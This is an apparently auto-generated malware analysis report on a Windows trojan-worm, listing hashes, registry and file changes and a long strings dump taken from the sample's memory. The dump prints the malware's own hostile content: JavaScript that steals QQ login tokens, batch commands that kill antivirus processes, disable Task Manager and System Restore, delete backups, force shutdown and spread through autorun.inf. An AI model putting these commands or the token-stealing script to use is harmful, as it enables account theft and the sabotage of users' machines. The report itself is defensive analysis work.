Generic.Malware.SFMDYBVd.380DE3A6_a823d3943c

by malwarelabrobot on September 13th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.380DE3A6 (B) (Emsisoft), Generic.Malware.SFMDYBVd.380DE3A6 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, WormAutorun, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a823d3943c7ecc605d5e5a2346eec144
SHA1: eb47cadac6c5d8d7e773bb41c91363c90bb181bf
SHA256: c46c81403bc2643dd9cbad88c3bf9bf1e0b82adc1fe6db44df2131cd0a03dc49
SSDeep: 6144:nq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg8OM0bzp45fW:q9N3JV6kr1cVOWdCLFfXf8gnp41W
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Generic creates the following process(es):

net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644

The Generic injects its code into the following process(es):

%original file name%.exe:1756

Mutexes

The following mutexes were created/opened:

RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1756 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)

Registry activity

The process %original file name%.exe:1756 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 16 E1 49 03 B3 D8 72 E9 4D AF FC EE 14 31 D0"

To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"

The process net.exe:1364 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E F6 22 70 43 C0 C8 57 FE 6D 41 29 4E 51 1A F0"

The process net.exe:1772 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 69 8C 28 D6 E0 14 4D 51 9F 20 DE C2 2D 93 22"

The process net1.exe:1316 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 36 7D 30 6D 4A 0A 9E 92 98 50 4A EE 5B 12 7F"

The process net1.exe:644 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 78 7E 91 FB 80 78 06 E8 4F 84 B4 8E C5 03 C3"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 651264 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 655360 290816 287232 5.49401 d3b9f527d2e9a1552783d2289ad5c0b8
.rsrc 946176 16384 16384 2.49987 e2784112b04c223b0d25494fb365f9a9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
caf03e9cc3118627cd7c3d133a311224
0a9ae60a1507dc9b0141dcb01ee413f6

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Generic connects to the servers at the folowing location(s):

%original file name%.exe_1756:

`.rsrc
t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXp://
len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat  r  s  h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf  r  s  h >>d:\setup.bat
attrib d:\setup.bat  r  s  h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat  r  s  h%
attrib %systemroot%/windows.bat  r  s  h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat  r  s  h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf  r  s  h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf  r  s  h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat  r  s  h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat  r  s  h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
%FN~/v
r1.Xj9S/-W
 %CGK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.1.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.6.0.0
(hXXp://VVV.eyuyan.com)

%original file name%.exe_1756_rwx_00401000_000E4000:

t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXp://
len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat  r  s  h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
